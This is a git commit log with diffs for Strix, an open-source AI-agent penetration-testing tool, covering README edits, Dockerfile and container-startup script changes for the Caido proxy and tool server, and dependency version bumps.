34 Commits

Author SHA1 Message Date
0xallam
86f8835ccb chore: bump version to 0.6.2 and sandbox to 0.1.11 2026-01-18 18:29:44 -08:00
0xallam
2bfb80ff4a refactor: share single browser instance across all agents
- Use singleton browser with isolated BrowserContext per agent instead of
  separate Chromium processes per agent
- Add cleanup logic for stale browser/playwright on reconnect
- Add resource management instructions to browser schema (close tabs/browser when done)
- Suppress Kali login message in Dockerfile
2026-01-18 17:51:23 -08:00
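The singleton-browser pattern from this commit can be sketched as follows. This is a hypothetical stand-in, not the actual Strix code: the class models one shared Playwright `Browser` process handing out an isolated `BrowserContext` per agent (real Playwright would use `browser.new_context()`).

```python
class SharedBrowser:
    """Stand-in for one shared Playwright Browser process (hypothetical sketch)."""

    _instance = None

    @classmethod
    def get(cls):
        # One shared browser instead of a separate Chromium process per agent
        if cls._instance is None:
            cls._instance = cls()
        return cls._instance

    def __init__(self):
        self.contexts = {}

    def new_context(self, agent_id):
        # Isolated per-agent context: own cookies/storage, shared process.
        # With Playwright this would be browser.new_context().
        ctx = {"agent": agent_id, "cookies": {}, "pages": []}
        self.contexts[agent_id] = ctx
        return ctx
```

Every agent that calls `SharedBrowser.get()` receives the same browser object, while `new_context()` keeps their session state separate.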
0xallam
7ff0e68466 fix: create fresh gql client per request to avoid transport state issues 2026-01-17 22:19:21 -08:00
0xallam
2ebfd20db5 fix: add telemetry module to Dockerfile for posthog error tracking 2026-01-17 22:19:21 -08:00
0xallam
918a151892 refactor: simplify tool server to asyncio tasks with per-agent isolation
- Replace multiprocessing/threading with single asyncio task per agent
- Add task cancellation: new request cancels previous for same agent
- Add per-agent state isolation via ContextVar for Terminal, Browser, Python managers
- Add posthog telemetry for tool execution errors (timeout, http, sandbox)
- Fix proxy manager singleton pattern
- Increase client timeout buffer over server timeout
- Add context.py to Dockerfile
2026-01-17 22:19:21 -08:00
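The cancellation and isolation scheme described above can be sketched with `asyncio` and `contextvars`. All names here (`run_tool`, `current_agent`, `_running`) are hypothetical illustrations, not the actual tool-server API: a new request cancels the previous task for the same agent, and the `ContextVar` value is inherited by the spawned task, giving each agent's managers their own view of state.

```python
import asyncio
from contextvars import ContextVar

# Each asyncio task sees its own copy of this value; it stands in for
# the per-agent Terminal/Browser/Python manager state.
current_agent: ContextVar[str] = ContextVar("current_agent", default="?")
_running: dict[str, asyncio.Task] = {}

async def run_tool(agent_id: str, coro_factory):
    # A new request cancels any in-flight request for the same agent
    prev = _running.get(agent_id)
    if prev is not None and not prev.done():
        prev.cancel()
    current_agent.set(agent_id)
    task = asyncio.create_task(coro_factory())  # inherits this context
    _running[agent_id] = task
    return await task
```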
0xallam
a80ecac7bd fix: run tool server as module to ensure correct sys.path for workers 2026-01-17 22:19:21 -08:00
0xallam
19246d8a5a style: remove redundant sudo -E flag 2026-01-17 22:19:21 -08:00
0xallam
4cb2cebd1e fix: add initial delay and increase retries for tool server health check 2026-01-17 22:19:21 -08:00
0xallam
26b0786a4e fix: replace pgrep with health check for tool server validation 2026-01-17 22:19:21 -08:00
0xallam
61dea7010a refactor: simplify container initialization and fix startup reliability
- Move tool server startup from Python to entrypoint script
- Hardcode Caido port (48080) in entrypoint, remove from Python
- Use /app/venv/bin/python directly instead of poetry run
- Fix env var passing through sudo with sudo -E and explicit vars
- Add Caido process monitoring and logging during startup
- Add retry logic with exponential backoff for token fetch
- Add tool server process validation before declaring ready
- Simplify docker_runtime.py (489 -> 310 lines)
- DRY up container state recovery into _recover_container_state()
- Add container creation retry logic (3 attempts)
- Fix GraphQL health check URL (/graphql/ with trailing slash)
2026-01-17 22:19:21 -08:00
dependabot[bot]
c433d4ffb2 chore(deps): bump pyasn1 from 0.6.1 to 0.6.2
Bumps [pyasn1](https://github.com/pyasn1/pyasn1) from 0.6.1 to 0.6.2.
- [Release notes](https://github.com/pyasn1/pyasn1/releases)
- [Changelog](https://github.com/pyasn1/pyasn1/blob/main/CHANGES.rst)
- [Commits](https://github.com/pyasn1/pyasn1/compare/v0.6.1...v0.6.2)

---
updated-dependencies:
- dependency-name: pyasn1
  dependency-version: 0.6.2
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-16 15:26:13 -08:00
0xallam
ed6861db64 fix(tool_server): include request_id in worker errors and use get_running_loop
- Add request_id to worker error responses to prevent client hangs
- Replace deprecated get_event_loop() with get_running_loop() in execute_tool
2026-01-16 01:11:02 -08:00
0xallam
a74ed69471 fix(tool_server): use get_running_loop() instead of deprecated get_event_loop() 2026-01-16 01:11:02 -08:00
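The `get_running_loop()` change boils down to this pattern (a minimal sketch; the real `execute_tool` signature may differ):

```python
import asyncio

async def execute_tool(fn, *args):
    # get_event_loop() is deprecated inside coroutines since Python 3.10;
    # get_running_loop() returns the active loop, or raises if none is running
    loop = asyncio.get_running_loop()
    return await loop.run_in_executor(None, fn, *args)
```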
0xallam
9102b22381 fix(python): prevent stdout/stderr race on timeout
Add cancelled flag to prevent timed-out thread's finally block from
overwriting stdout/stderr when a subsequent execution has already
started capturing output.
2026-01-16 01:11:02 -08:00
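The fix can be illustrated with this hypothetical sketch (class and method names are assumptions, not the actual `python_instance` code): the `cancelled` flag gates the `finally` block so a timed-out run never restores `sys.stdout` over a newer execution's capture.

```python
import io
import sys

class PythonExecution:
    """Hypothetical sketch of the timed-out-thread stdout race fix."""

    def __init__(self):
        self.cancelled = False  # set by the manager when this run times out

    def run(self, code: str, captured: io.StringIO) -> None:
        original = sys.stdout
        sys.stdout = captured
        try:
            exec(code)  # sandboxed user code in the real tool
        finally:
            # A timed-out run must not restore stdout: a newer execution
            # may already be capturing, and restoring would clobber it.
            if not self.cancelled:
                sys.stdout = original
```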
0xallam
693ef16060 fix(runtime): parallel tool execution and remove signal handlers
- Add ThreadPoolExecutor in agent_worker for parallel request execution
- Add request_id correlation to prevent response mismatch between concurrent requests
- Add background listener thread per agent to dispatch responses to correct futures
- Add --timeout argument for hard request timeout (default: 120s from config)
- Remove signal handlers from terminal_manager, python_manager, tab_manager (use atexit only)
- Replace SIGALRM timeout in python_instance with threading-based timeout

This fixes requests getting queued behind slow operations and timeouts.
2026-01-16 01:11:02 -08:00
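The request_id correlation mechanism can be sketched like this (hypothetical names and shapes, assuming dict-based messages): each request registers a future keyed by its id, and the background listener resolves exactly that future when the matching response arrives, so concurrent requests can never receive each other's results.

```python
import asyncio
import itertools

_request_ids = itertools.count(1)
_pending: dict[int, asyncio.Future] = {}

def dispatch_response(message: dict) -> None:
    # The per-agent listener calls this for every worker message;
    # request_id routes it to whichever future issued the request
    fut = _pending.pop(message["request_id"], None)
    if fut is not None and not fut.done():
        fut.set_result(message["result"])

async def send_request(payload: dict, transport) -> object:
    request_id = next(_request_ids)
    fut = asyncio.get_running_loop().create_future()
    _pending[request_id] = fut
    transport({"request_id": request_id, **payload})
    return await fut  # resolved only by the matching response
```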
0xallam
8dc6f1dc8f fix(llm): remove hardcoded temperature from dedupe check
Allow the model's default temperature setting to be used instead of
forcing temperature=0 for duplicate detection.
2026-01-15 18:56:48 -08:00
0xallam
4d9154a7f8 fix(config): keep non-LLM saved env values
When LLM env differs, drop only LLM-related saved entries instead of
clearing all saved env vars, preserving other config like API keys.
2026-01-15 18:37:38 -08:00
0xallam
2898db318e fix(config): canonicalize LLM env and respect cleared vars
Drop saved LLM config if any current LLM env var differs, and treat
explicit empty env vars as cleared so saved values are removed and
not re-applied.
2026-01-15 18:37:38 -08:00
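The two config fixes combine into one merge rule, sketched here with hypothetical key names (`LLM_KEYS` and the env var names are illustrative, not the actual Strix config schema): when any current LLM var differs, only LLM-related saved entries are dropped, and an explicitly empty current value means "cleared" rather than "fall back to saved".

```python
LLM_KEYS = {"STRIX_LLM", "LLM_API_KEY", "LLM_API_BASE"}  # hypothetical names

def merge_saved_env(saved: dict, current: dict) -> dict:
    # Drop only LLM-related saved entries when the LLM config changed
    llm_changed = any(
        k in current and current[k] != saved.get(k) for k in LLM_KEYS
    )
    merged = {
        k: v for k, v in saved.items()
        if not (llm_changed and k in LLM_KEYS)
    }
    # Explicitly empty current values mean "cleared": remove, don't re-apply
    for k, v in current.items():
        if v == "":
            merged.pop(k, None)
        else:
            merged[k] = v
    return merged
```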
0xallam
960bb91790 fix(tui): suppress stderr output in python renderer 2026-01-15 17:44:49 -08:00
0xallam
4de4be683f fix(executor): include error type in httpx RequestError messages
The str() of httpx.RequestError was often empty, making error messages
unhelpful. Now includes the exception type (e.g., ConnectError) for
better debugging.
2026-01-15 17:40:21 -08:00
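The fix amounts to prefixing the exception class name, along these lines (a generic sketch; the real executor works with `httpx.RequestError` subclasses such as `ConnectError`):

```python
def describe_error(exc: Exception) -> str:
    # str() of httpx.RequestError subclasses is often empty; including
    # the class name keeps the message useful for debugging
    detail = str(exc)
    return f"{type(exc).__name__}: {detail}" if detail else type(exc).__name__
```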
0xallam
d351b14ae7 docs(tools): add comprehensive multiline examples and remove XML terminology
- Add professional, realistic multiline examples to all tool schemas
- finish_scan: Complete pentest report with SSRF/access control findings
- create_vulnerability_report: Full SSRF writeup with cloud metadata PoC
- file_edit, notes, thinking: Realistic security testing examples
- Remove XML terminology from system prompt and tool descriptions
- All examples use real newlines (not literal \n) to demonstrate correct usage
2026-01-15 17:25:28 -08:00
Ahmed Allam
ceeec8faa8 Update README 2026-01-16 02:34:30 +04:00
0xallam
e5104eb93a chore(release): bump version to 0.6.1 2026-01-14 21:30:14 -08:00
0xallam
d8a08e9a8c chore(prompt): discourage literal \n in tool params 2026-01-14 21:29:06 -08:00
0xallam
f6475cec07 chore(prompt): enforce single tool call per message and remove stop word usage 2026-01-14 19:51:08 -08:00
0xallam
31baa0dfc0 fix: restore ollama_api_base config fallback for Ollama support 2026-01-14 18:54:45 -08:00
0xallam
56526cbf90 fix(agent): fix agent loop hanging and simplify LLM module
- Fix agent loop getting stuck by adding hard stop mechanism
- Add _force_stop flag for immediate task cancellation across threads
- Use thread-safe loop.call_soon_threadsafe for cross-thread cancellation
- Remove request_queue.py (eliminated threading/queue complexity causing hangs)
- Simplify llm.py: direct acompletion calls, cleaner streaming
- Reduce retry wait times to prevent long hangs during retries
- Make timeouts configurable (llm_max_retries, memory_compressor_timeout, sandbox_execution_timeout)
- Keep essential token tracking (input/output/cached tokens, cost, requests)
- Maintain Anthropic prompt caching for system messages
2026-01-14 18:54:45 -08:00
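The thread-safe cancellation mentioned above follows this pattern (function name is illustrative): `Task.cancel()` is not safe to call from another thread, so the cancellation is handed to the event loop's own thread via `call_soon_threadsafe`.

```python
import asyncio
import threading

def force_stop(loop: asyncio.AbstractEventLoop, task: asyncio.Task) -> None:
    # Task.cancel() is not thread-safe; schedule it on the loop's thread
    loop.call_soon_threadsafe(task.cancel)
```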
0xallam
47faeb1ef3 fix(agent): use correct agent name in identity instead of class name 2026-01-14 11:24:24 -08:00
0xallam
435ac82d9e chore: add defusedxml dependency 2026-01-14 10:57:32 -08:00
0xallam
f08014cf51 fix(agent): fix tool schemas not retrieved on pyinstaller binary and validate tool call args 2026-01-14 10:57:32 -08:00
dependabot[bot]
bc8e14f68a chore(deps-dev): bump virtualenv from 20.34.0 to 20.36.1
Bumps [virtualenv](https://github.com/pypa/virtualenv) from 20.34.0 to 20.36.1.
- [Release notes](https://github.com/pypa/virtualenv/releases)
- [Changelog](https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst)
- [Commits](https://github.com/pypa/virtualenv/compare/20.34.0...20.36.1)

---
updated-dependencies:
- dependency-name: virtualenv
  dependency-version: 20.36.1
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:58 -08:00
dependabot[bot]
eae2b783c0 chore(deps): bump filelock from 3.20.1 to 3.20.3
Bumps [filelock](https://github.com/tox-dev/py-filelock) from 3.20.1 to 3.20.3.
- [Release notes](https://github.com/tox-dev/py-filelock/releases)
- [Changelog](https://github.com/tox-dev/filelock/blob/main/docs/changelog.rst)
- [Commits](https://github.com/tox-dev/py-filelock/compare/3.20.1...3.20.3)

---
updated-dependencies:
- dependency-name: filelock
  dependency-version: 3.20.3
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:43 -08:00
dependabot[bot]
058cf1abdb chore(deps): bump azure-core from 1.35.0 to 1.38.0
Bumps [azure-core](https://github.com/Azure/azure-sdk-for-python) from 1.35.0 to 1.38.0.
- [Release notes](https://github.com/Azure/azure-sdk-for-python/releases)
- [Commits](https://github.com/Azure/azure-sdk-for-python/compare/azure-core_1.35.0...azure-core_1.38.0)

---
updated-dependencies:
- dependency-name: azure-core
  dependency-version: 1.38.0
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2026-01-13 17:15:22 -08:00
Ahmed Allam
d16bdb277a Update README 2026-01-14 05:00:16 +04:00
40 changed files with 1480 additions and 1308 deletions

View File

@@ -1,55 +1,61 @@
<p align="center">
<a href="https://strix.ai/">
<img src=".github/logo.png" width="150" alt="Strix Logo">
<img src="https://github.com/usestrix/.github/raw/main/imgs/cover.png" alt="Strix Banner" width="100%">
</a>
</p>
<h1 align="center">Strix</h1>
<h2 align="center">Open-source AI Hackers to secure your Apps</h2>
<div align="center">
[![Python](https://img.shields.io/pypi/pyversions/strix-agent?color=3776AB)](https://pypi.org/project/strix-agent/)
[![PyPI](https://img.shields.io/pypi/v/strix-agent?color=10b981)](https://pypi.org/project/strix-agent/)
[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)
[![Docs](https://img.shields.io/badge/Docs-docs.strix.ai-10b981.svg)](https://docs.strix.ai)
# Strix
[![GitHub Stars](https://img.shields.io/github/stars/usestrix/strix)](https://github.com/usestrix/strix)
[![Discord](https://img.shields.io/badge/Discord-%235865F2.svg?&logo=discord&logoColor=white)](https://discord.gg/YjKFvEZSdZ)
[![Website](https://img.shields.io/badge/Website-strix.ai-2d3748.svg)](https://strix.ai)
### Open-source AI hackers to find and fix your apps' vulnerabilities.
<a href="https://trendshift.io/repositories/15362" target="_blank"><img src="https://trendshift.io/api/badge/repositories/15362" alt="usestrix%2Fstrix | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
<br/>
[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/usestrix/strix)
<a href="https://docs.strix.ai"><img src="https://img.shields.io/badge/Docs-docs.strix.ai-2b9246?style=for-the-badge&logo=gitbook&logoColor=white" alt="Docs"></a>
<a href="https://strix.ai"><img src="https://img.shields.io/badge/Website-strix.ai-3b82f6?style=for-the-badge&logoColor=white" alt="Website"></a>
<a href="https://pypi.org/project/strix-agent/"><img src="https://img.shields.io/badge/PyPI-strix--agent-f59e0b?style=for-the-badge&logo=pypi&logoColor=white" alt="PyPI"></a>
<a href="https://deepwiki.com/usestrix/strix"><img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"></a>
<a href="https://github.com/usestrix/strix"><img src="https://img.shields.io/github/stars/usestrix/strix?style=flat-square" alt="GitHub Stars"></a>
<a href="LICENSE"><img src="https://img.shields.io/badge/License-Apache%202.0-3b82f6?style=flat-square" alt="License"></a>
<a href="https://pypi.org/project/strix-agent/"><img src="https://img.shields.io/pypi/v/strix-agent?style=flat-square" alt="PyPI Version"></a>
<a href="https://discord.gg/YjKFvEZSdZ"><img src="https://github.com/usestrix/.github/raw/main/imgs/Discord.png" height="40" alt="Join Discord"></a>
<a href="https://x.com/strix_ai"><img src="https://github.com/usestrix/.github/raw/main/imgs/X.png" height="40" alt="Follow on X"></a>
<a href="https://trendshift.io/repositories/15362" target="_blank"><img src="https://trendshift.io/api/badge/repositories/15362" alt="usestrix/strix | Trendshift" width="250" height="55"/></a>
</div>
<br>
<br/>
<div align="center">
<img src=".github/screenshot.png" alt="Strix Demo" width="800" style="border-radius: 16px;">
<img src=".github/screenshot.png" alt="Strix Demo" width="900" style="border-radius: 16px;">
</div>
<br>
> [!TIP]
> **New!** Strix now integrates seamlessly with GitHub Actions and CI/CD pipelines. Automatically scan for vulnerabilities on every pull request and block insecure code before it reaches production!
> **New!** Strix integrates seamlessly with GitHub Actions and CI/CD pipelines. Automatically scan for vulnerabilities on every pull request and block insecure code before it reaches production!
---
## 🦉 Strix Overview
## Strix Overview
Strix are autonomous AI agents that act just like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual proof-of-concepts. Built for developers and security teams who need fast, accurate security testing without the overhead of manual pentesting or the false positives of static analysis tools.
**Key Capabilities:**
- 🔧 **Full hacker toolkit** out of the box
- 🤝 **Teams of agents** that collaborate and scale
- **Real validation** with PoCs, not false positives
- 💻 **Developer-first** CLI with actionable reports
- 🔄 **Autofix & reporting** to accelerate remediation
- **Full hacker toolkit** out of the box
- **Teams of agents** that collaborate and scale
- **Real validation** with PoCs, not false positives
- **Developer-first** CLI with actionable reports
- **Autofix & reporting** to accelerate remediation
## 🎯 Use Cases
@@ -87,7 +93,7 @@ strix --target ./app-directory
> [!NOTE]
> First run automatically pulls the sandbox Docker image. Results are saved to `strix_runs/<run-name>`
## ☁️ Run Strix in Cloud
## Run Strix in Cloud
Want to skip the local setup, API keys, and unpredictable LLM costs? Run the hosted cloud version of Strix at **[app.strix.ai](https://strix.ai)**.
@@ -104,7 +110,7 @@ Launch a scan in just a few minutes—no setup or configuration required—and y
## ✨ Features
### 🛠️ Agentic Security Tools
### Agentic Security Tools
Strix agents come equipped with a comprehensive security testing toolkit:
@@ -116,7 +122,7 @@ Strix agents come equipped with a comprehensive security testing toolkit:
- **Code Analysis** - Static and dynamic analysis capabilities
- **Knowledge Management** - Structured findings and attack documentation
### 🎯 Comprehensive Vulnerability Detection
### Comprehensive Vulnerability Detection
Strix can identify and validate a wide range of security vulnerabilities:
@@ -128,7 +134,7 @@ Strix can identify and validate a wide range of security vulnerabilities:
- **Authentication** - JWT vulnerabilities, session management
- **Infrastructure** - Misconfigurations, exposed services
### 🕸️ Graph of Agents
### Graph of Agents
Advanced multi-agent orchestration for comprehensive security testing:
@@ -138,7 +144,7 @@ Advanced multi-agent orchestration for comprehensive security testing:
---
## 💻 Usage Examples
## Usage Examples
### Basic Usage
@@ -169,7 +175,7 @@ strix --target api.your-app.com --instruction "Focus on business logic flaws and
strix --target api.your-app.com --instruction-file ./instruction.md
```
### 🤖 Headless Mode
### Headless Mode
Run Strix programmatically without the interactive UI using the `-n/--non-interactive` flag, perfect for servers and automated jobs. The CLI prints real-time vulnerability findings and the final report before exiting, and exits with a non-zero code when vulnerabilities are found.
@@ -177,7 +183,7 @@ Run Strix programmatically without interactive UI using the `-n/--non-interactiv
strix -n --target https://your-app.com
```
### 🔄 CI/CD (GitHub Actions)
### CI/CD (GitHub Actions)
Strix can be added to your pipeline to run a security test on pull requests with a lightweight GitHub Actions workflow:
@@ -204,7 +210,7 @@ jobs:
run: strix -n -t ./ --scan-mode quick
```
### ⚙️ Configuration
### Configuration
```bash
export STRIX_LLM="openai/gpt-5"
@@ -227,24 +233,25 @@ export STRIX_REASONING_EFFORT="high" # control thinking effort (default: high,
See the [LLM Providers documentation](https://docs.strix.ai/llm-providers/overview) for all supported providers including Vertex AI, Bedrock, Azure, and local models.
## 📚 Documentation
## Documentation
Full documentation is available at **[docs.strix.ai](https://docs.strix.ai)** — including detailed guides for usage, CI/CD integrations, skills, and advanced configuration.
## 🤝 Contributing
## Contributing
We welcome contributions of code, docs, and new skills - check out our [Contributing Guide](https://docs.strix.ai/contributing) to get started or open a [pull request](https://github.com/usestrix/strix/pulls)/[issue](https://github.com/usestrix/strix/issues).
## 👥 Join Our Community
## Join Our Community
Have questions? Found a bug? Want to contribute? **[Join our Discord!](https://discord.gg/YjKFvEZSdZ)**
## 🌟 Support the Project
## Support the Project
**Love Strix?** Give us a ⭐ on GitHub!
## 🙏 Acknowledgements
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [ProjectDiscovery](https://github.com/projectdiscovery), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
## Acknowledgements
Strix builds on the incredible work of open-source projects like [LiteLLM](https://github.com/BerriAI/litellm), [Caido](https://github.com/caido/caido), [Nuclei](https://github.com/projectdiscovery/nuclei), [Playwright](https://github.com/microsoft/playwright), and [Textual](https://github.com/Textualize/textual). Huge thanks to their maintainers!
> [!WARNING]

View File

@@ -9,7 +9,8 @@ RUN apt-get update && \
RUN useradd -m -s /bin/bash pentester && \
usermod -aG sudo pentester && \
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
echo "pentester ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers && \
touch /home/pentester/.hushlogin
RUN mkdir -p /home/pentester/configs \
/home/pentester/wordlists \
@@ -168,9 +169,12 @@ RUN /app/venv/bin/pip install -r /home/pentester/tools/jwt_tool/requirements.txt
RUN echo "# Sandbox Environment" > README.md
COPY strix/__init__.py strix/
COPY strix/config/ /app/strix/config/
COPY strix/utils/ /app/strix/utils/
COPY strix/telemetry/ /app/strix/telemetry/
COPY strix/runtime/tool_server.py strix/runtime/__init__.py strix/runtime/runtime.py /app/strix/runtime/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py /app/strix/tools/
COPY strix/tools/__init__.py strix/tools/registry.py strix/tools/executor.py strix/tools/argument_parser.py strix/tools/context.py /app/strix/tools/
COPY strix/tools/browser/ /app/strix/tools/browser/
COPY strix/tools/file_edit/ /app/strix/tools/file_edit/

View File

@@ -1,9 +1,12 @@
#!/bin/bash
set -e
if [ -z "$CAIDO_PORT" ]; then
echo "Error: CAIDO_PORT must be set."
exit 1
CAIDO_PORT=48080
CAIDO_LOG="/tmp/caido_startup.log"
if [ ! -f /app/certs/ca.p12 ]; then
echo "ERROR: CA certificate file /app/certs/ca.p12 not found."
exit 1
fi
caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
@@ -11,28 +14,62 @@ caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
--no-logging \
--no-open \
--import-ca-cert /app/certs/ca.p12 \
--import-ca-cert-pass "" > /dev/null 2>&1 &
--import-ca-cert-pass "" > "$CAIDO_LOG" 2>&1 &
CAIDO_PID=$!
echo "Started Caido with PID $CAIDO_PID on port $CAIDO_PORT"
echo "Waiting for Caido API to be ready..."
CAIDO_READY=false
for i in {1..30}; do
if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
echo "Caido API is ready."
if ! kill -0 $CAIDO_PID 2>/dev/null; then
echo "ERROR: Caido process died while waiting for API (iteration $i)."
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
if curl -s -o /dev/null -w "%{http_code}" http://localhost:${CAIDO_PORT}/graphql/ | grep -qE "^(200|400)$"; then
echo "Caido API is ready (attempt $i)."
CAIDO_READY=true
break
fi
sleep 1
done
if [ "$CAIDO_READY" = false ]; then
echo "ERROR: Caido API did not become ready within 30 seconds."
echo "Caido process status: $(kill -0 $CAIDO_PID 2>&1 && echo 'running' || echo 'dead')"
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
sleep 2
echo "Fetching API token..."
TOKEN=$(curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
TOKEN=""
for attempt in 1 2 3 4 5; do
RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
TOKEN=$(echo "$RESPONSE" | jq -r '.data.loginAsGuest.token.accessToken // empty')
if [ -n "$TOKEN" ] && [ "$TOKEN" != "null" ]; then
echo "Successfully obtained API token (attempt $attempt)."
break
fi
echo "Token fetch attempt $attempt failed: $RESPONSE"
sleep $((attempt * 2))
done
if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
echo "Failed to get API token from Caido."
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
echo "ERROR: Failed to get API token from Caido after 5 attempts."
echo "=== Caido log ==="
cat "$CAIDO_LOG" 2>/dev/null || echo "(no log available)"
exit 1
fi
@@ -40,7 +77,7 @@ export CAIDO_API_TOKEN=$TOKEN
echo "Caido API token has been set."
echo "Creating a new Caido project..."
CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
CREATE_PROJECT_RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
@@ -57,7 +94,7 @@ fi
echo "Caido project created with ID: $PROJECT_ID"
echo "Selecting Caido project..."
SELECT_RESPONSE=$(curl -s -X POST \
SELECT_RESPONSE=$(curl -sL -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
@@ -114,9 +151,36 @@ sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
echo "✅ CA added to browser trust store"
echo "Container initialization complete - agents will start their own tool servers as needed"
echo "✅ Shared container ready for multi-agent use"
echo "Starting tool server..."
cd /app
export PYTHONPATH=/app
export STRIX_SANDBOX_MODE=true
export POETRY_VIRTUALENVS_CREATE=false
export TOOL_SERVER_TIMEOUT="${STRIX_SANDBOX_EXECUTION_TIMEOUT:-120}"
TOOL_SERVER_LOG="/tmp/tool_server.log"
sudo -E -u pentester \
poetry run python -m strix.runtime.tool_server \
--token="$TOOL_SERVER_TOKEN" \
--host=0.0.0.0 \
--port="$TOOL_SERVER_PORT" \
--timeout="$TOOL_SERVER_TIMEOUT" > "$TOOL_SERVER_LOG" 2>&1 &
for i in {1..10}; do
if curl -s "http://127.0.0.1:$TOOL_SERVER_PORT/health" | grep -q '"status":"healthy"'; then
echo "✅ Tool server healthy on port $TOOL_SERVER_PORT"
break
fi
if [ $i -eq 10 ]; then
echo "ERROR: Tool server failed to become healthy"
echo "=== Tool server log ==="
cat "$TOOL_SERVER_LOG" 2>/dev/null || echo "(no log)"
exit 1
fi
sleep 1
done
echo "✅ Container ready"
cd /workspace
exec "$@"

poetry.lock generated
View File

@@ -379,19 +379,18 @@ files = [
[[package]]
name = "azure-core"
version = "1.35.0"
version = "1.38.0"
description = "Microsoft Azure Core Library for Python"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "azure_core-1.35.0-py3-none-any.whl", hash = "sha256:8db78c72868a58f3de8991eb4d22c4d368fae226dac1002998d6c50437e7dad1"},
{file = "azure_core-1.35.0.tar.gz", hash = "sha256:c0be528489485e9ede59b6971eb63c1eaacf83ef53001bfe3904e475e972be5c"},
{file = "azure_core-1.38.0-py3-none-any.whl", hash = "sha256:ab0c9b2cd71fecb1842d52c965c95285d3cfb38902f6766e4a471f1cd8905335"},
{file = "azure_core-1.38.0.tar.gz", hash = "sha256:8194d2682245a3e4e3151a667c686464c3786fed7918b394d035bdcd61bb5993"},
]
[package.dependencies]
requests = ">=2.21.0"
six = ">=1.11.0"
typing-extensions = ">=4.6.0"
[package.extras]
@@ -1199,6 +1198,18 @@ files = [
{file = "decorator-5.2.1.tar.gz", hash = "sha256:65f266143752f734b0a7cc83c46f4618af75b8c5911b00ccb61d0ac9b6da0360"},
]
[[package]]
name = "defusedxml"
version = "0.7.1"
description = "XML bomb protection for Python stdlib modules"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
groups = ["main"]
files = [
{file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"},
{file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
]
[[package]]
name = "dill"
version = "0.4.0"
@@ -1490,14 +1501,14 @@ files = [
[[package]]
name = "filelock"
version = "3.20.1"
version = "3.20.3"
description = "A platform independent file lock."
optional = false
python-versions = ">=3.10"
groups = ["main", "dev"]
files = [
{file = "filelock-3.20.1-py3-none-any.whl", hash = "sha256:15d9e9a67306188a44baa72f569d2bfd803076269365fdea0934385da4dc361a"},
{file = "filelock-3.20.1.tar.gz", hash = "sha256:b8360948b351b80f420878d8516519a2204b07aefcdcfd24912a5d33127f188c"},
{file = "filelock-3.20.3-py3-none-any.whl", hash = "sha256:4b0dda527ee31078689fc205ec4f1c1bf7d56cf88b6dc9426c4f230e46c2dce1"},
{file = "filelock-3.20.3.tar.gz", hash = "sha256:18c57ee915c7ec61cff0ecf7f0f869936c7c30191bb0cf406f1341778d0834e1"},
]
[[package]]
@@ -4845,15 +4856,14 @@ files = [
[[package]]
name = "pyasn1"
version = "0.6.1"
version = "0.6.2"
description = "Pure-Python implementation of ASN.1 types and DER/BER/CER codecs (X.208)"
optional = true
optional = false
python-versions = ">=3.8"
groups = ["main"]
markers = "extra == \"vertex\""
files = [
{file = "pyasn1-0.6.1-py3-none-any.whl", hash = "sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629"},
{file = "pyasn1-0.6.1.tar.gz", hash = "sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034"},
